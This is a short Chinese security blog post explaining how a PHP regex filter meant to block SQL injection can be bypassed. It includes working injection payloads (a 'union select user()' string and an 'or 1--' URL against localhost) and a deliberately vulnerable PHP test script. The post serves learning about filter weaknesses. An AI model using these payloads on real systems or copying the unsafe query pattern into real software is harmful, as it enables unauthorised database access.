记一次正则匹配绕过

字数统计: 453字   |   阅读时长≈ 1分

前言

打开论坛发现有表哥在讨论一个问题,如下代码存在注入吗?

1
2
3
select * from admin where (guanliyuan='{$guanliyuan}' and mima='{$pwd}')
过滤方法:
preg_replace("/[^a-z][^0-9]/","",$str);

翻了一下留言很多表哥和我的最开始想法一样就是'等特殊字符都被过滤了不存在注入,没戏。

翻到最后看到有一个大佬发了一个payload:

1
'0a 0aunion 0aselect 0auser0a(0a)0a)0a#

成功绕过了正则匹配,最终结果如下:

1
select * from admin where (guanliyuan='' union select user())#' and mima='')

顿时精神了,起来研究。

正则匹配绕过

一开始怎么也没想懂和大佬交流发现主要还是自已对正则的理解太不到家了。。

1
preg_replace("/[^a-z][^0-9]/","",$str);

首先该正则表达式的意思为每次匹配两个字符,第一个不是字符第二个不是数字那就会被替换掉(我一开始就陷入思维的死胡同中,就是我认为该正则表达式是把所有非字符数字替换为空,丢脸丢到姥姥家了。。。。)

理解这些剩下就简单了,只需在我们sql注入需要使用的特别字符的前后添加符合条件的第一个不是字符第二个不是数字的字符即可绕过限制。

简单的sql注入测试代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
$con = @mysql_connect("localhost","root","xxx");
if (!$con)
  {
  die('Could not connect: ' . mysql_error());
  }

mysql_select_db("dvwa", $con);
$user = preg_replace("/[^a-z][^0-9]/","",$_GET["user"]);
echo $user;
$result = mysql_query("SELECT user,password FROM users where user = '$user'",$con);
var_dump(mysql_fetch_array($result));
mysql_close($con);
?>

payload:

1
http://127.0.0.1/test.php?user='0a 0aor0a 0a 10a 0a-0a-0a+0a

谢谢你请我吃糖果

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

一个关于网络安全学习、生活思考的博客
希望在互联网留下自已的脚印